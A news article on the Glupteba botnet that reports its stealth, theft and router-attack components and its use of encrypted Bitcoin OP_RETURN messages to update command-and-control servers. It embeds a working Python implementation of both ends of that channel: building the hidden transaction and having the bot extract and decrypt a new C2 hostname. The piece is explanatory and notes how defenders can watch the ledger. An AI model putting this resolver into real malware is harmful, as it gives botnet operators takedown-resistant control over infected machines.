Glupteba, a stealthy, remotely controlled malware, includes a range of components to cover its tracks, and it updates itself using encrypted messages hidden in the Bitcoin blockchain, write cybersecurity experts from Sophos Labs.
The Glupteba bot is a malware campaign that plants backdoors with full access on infected devices, which are then added to its growing botnet. The analysis describes it as a “highly self-defending malware” with “enhancing features that enable the malware to evade detection.”
The most interesting aspect of Glupteba is that it uses the Bitcoin blockchain as a communication channel for receiving updated configuration information. A Bitcoin transaction can carry a small arbitrary data field (an OP_RETURN output, limited to 80 bytes under the default relay policy), which is usually used for comments or timestamps.
Glupteba uses this data field for encrypted messages. The messages contain secrets such as command-and-control server names, so the operators can point the botnet at new infrastructure simply by broadcasting a new transaction, while the secrets stay hidden in plain sight on a public ledger that nobody can edit or take down.
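To make the mechanism concrete, here is an added example (not Glupteba's code and not from the Sophos report) of both ends of such a channel: the operator side builds an OP_RETURN script holding an encrypted hostname, and the bot side walks a transaction's outputs, picks out the OP_RETURN payload, verifies and decrypts it, and returns the new C2 name. The article does not say which cipher or key Glupteba uses, so the example assumes a stand-in encrypt-then-MAC construction built from HMAC-SHA256 (keystream plus truncated tag) so that it runs on the Python standard library alone; the key, nonce length, hostname and transaction outputs are all constructed for the demo.

```python
"""OP_RETURN-based C2 update channel, illustrative only (added example).

Assumptions not taken from the article: the cipher is an HMAC-SHA256
keystream with an encrypt-then-MAC tag (a stand-in, not Glupteba's real
scheme), the nonce is 8 bytes, the tag is 16 bytes, and the sample
transaction outputs and key below are constructed for the demo.
"""
import hashlib
import hmac
import os
import struct
from typing import List, Optional

OP_RETURN = 0x6A
OP_PUSHDATA1 = 0x4C
MAX_OP_RETURN_DATA = 80   # default relay limit for OP_RETURN data, in bytes
NONCE_LEN = 8
TAG_LEN = 16
# 80 - NONCE_LEN - TAG_LEN = 56 bytes of plaintext fit, enough for a hostname.


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    """Derive n keystream bytes as HMAC(key, nonce || counter) blocks."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hmac.new(key, nonce + struct.pack(">I", counter), hashlib.sha256).digest()
        counter += 1
    return out[:n]


def encrypt(key: bytes, plaintext: bytes, nonce: Optional[bytes] = None) -> bytes:
    """Return nonce || ciphertext || tag (encrypt-then-MAC, stand-in scheme)."""
    nonce = os.urandom(NONCE_LEN) if nonce is None else nonce
    if len(nonce) != NONCE_LEN:
        raise ValueError("bad nonce length")
    ks = _keystream(key, nonce, len(plaintext))
    ct = bytes(a ^ b for a, b in zip(plaintext, ks))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:TAG_LEN]
    return nonce + ct + tag


def decrypt(key: bytes, blob: bytes) -> bytes:
    """Verify the tag in constant time, then strip the keystream."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        raise ValueError("blob too short")
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed")
    ks = _keystream(key, nonce, len(ct))
    return bytes(a ^ b for a, b in zip(ct, ks))


def op_return_script(data: bytes) -> bytes:
    """Operator side: build the scriptPubKey `OP_RETURN <push data>`."""
    if len(data) > MAX_OP_RETURN_DATA:
        raise ValueError("payload exceeds the 80-byte OP_RETURN limit")
    # Bitcoin script: lengths 1..75 are a direct push opcode, larger use OP_PUSHDATA1.
    push = bytes([len(data)]) if len(data) <= 75 else bytes([OP_PUSHDATA1, len(data)])
    return bytes([OP_RETURN]) + push + data


def extract_op_return(script: bytes) -> Optional[bytes]:
    """Bot side: return the pushed data if the script is an OP_RETURN output."""
    if not script or script[0] != OP_RETURN:
        return None
    if len(script) == 1:
        return b""
    opcode = script[1]
    if opcode <= 75:
        length, start = opcode, 2
    elif opcode == OP_PUSHDATA1 and len(script) >= 3:
        length, start = script[2], 3
    else:
        return None
    payload = script[start:start + length]
    return payload if len(payload) == length else None


def update_c2(key: bytes, tx_outputs: List[bytes]) -> Optional[str]:
    """Scan a transaction's output scripts for a valid encrypted C2 hostname.

    Outputs that are not OP_RETURN, or whose payload fails authentication
    (wrong key, tampering, unrelated data in the same field), are skipped.
    """
    for script in tx_outputs:
        data = extract_op_return(script)
        if data is None:
            continue
        try:
            return decrypt(key, data).decode("ascii")
        except ValueError:   # covers bad tag, short blob and non-ASCII decode
            continue
    return None


if __name__ == "__main__":
    key = hashlib.sha256(b"constructed demo key").digest()       # constructed
    blob = encrypt(key, b"c2.example.test")                       # constructed hostname
    outputs = [
        bytes.fromhex("76a914" + "00" * 20 + "88ac"),             # constructed P2PKH output
        op_return_script(blob),                                   # the hidden update
    ]
    print(update_c2(key, outputs))
```

An observer scanning the chain sees only an opaque blob in the OP_RETURN field; without the key the bot carries, neither the hostname nor its validity is recoverable, and because the tag is checked before decryption, a third party cannot redirect the botnet by publishing their own OP_RETURN data. For defenders, the useful angle is the reverse of `update_c2`: the addresses the bot polls are fixed in the binary, so the transactions it will read can be watched on the public ledger even though their contents cannot be altered.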
Other notable capabilities of Glupteba include:
- A cryptojacker component that acts as a management tool for covert cryptocurrency miners.
- A rootkit that helps it to avoid detection by keeping malware files off the radar if loaded successfully.
- A virus component that spreads itself automatically across the local network.
- A security suppressor that does its best to turn Windows Defender off.
- A browser stealer that goes after local Chrome, Firefox, Yandex, and Opera data files.
- A router attack tool to exploit popular home and small business routers to attack other people.
The malware is still under active development and appears to be aimed at infecting as many computers as possible.
The report authors write:
“With the use of its exhaustive backdoor functions, Glupteba can download a wide variety of other malware, while collecting a large amount of information from the victim’s computer. Even today, Glupteba drops cryptocurrency miners and browser stealer components, attacks MikroTik routers, and leverages its proxy components to conceal which binary is communicating with the outside world.”
Jameson Lopp, CTO at crypto security specialist Casa and a Bitcoin developer, described the malware as “an unstoppable dapp”:
Put your botnet’s command & control infrastructure on a censorship resistant distributed database? That’s what I call an unstoppable dapp! https://t.co/qDptVF3YNO
— Jameson Lopp (@lopp) June 24, 2020
This sophisticated malware is just another example of a non-monetary use case for Bitcoin and its uncensorable public ledger, alongside virtual power plants and open digital identity (DID) systems.
To protect yourself, Sophos Labs suggests the following security practices:
- Patch early and often. Make sure that your operating system, apps, and related devices like routers or servers are always up to date.
- Use a decent anti-virus with web filtering.
- Stay away from hooky software (cracked programs downloaded from the web for free instead of paying for a licensed version), as it is likely to be infected with malware.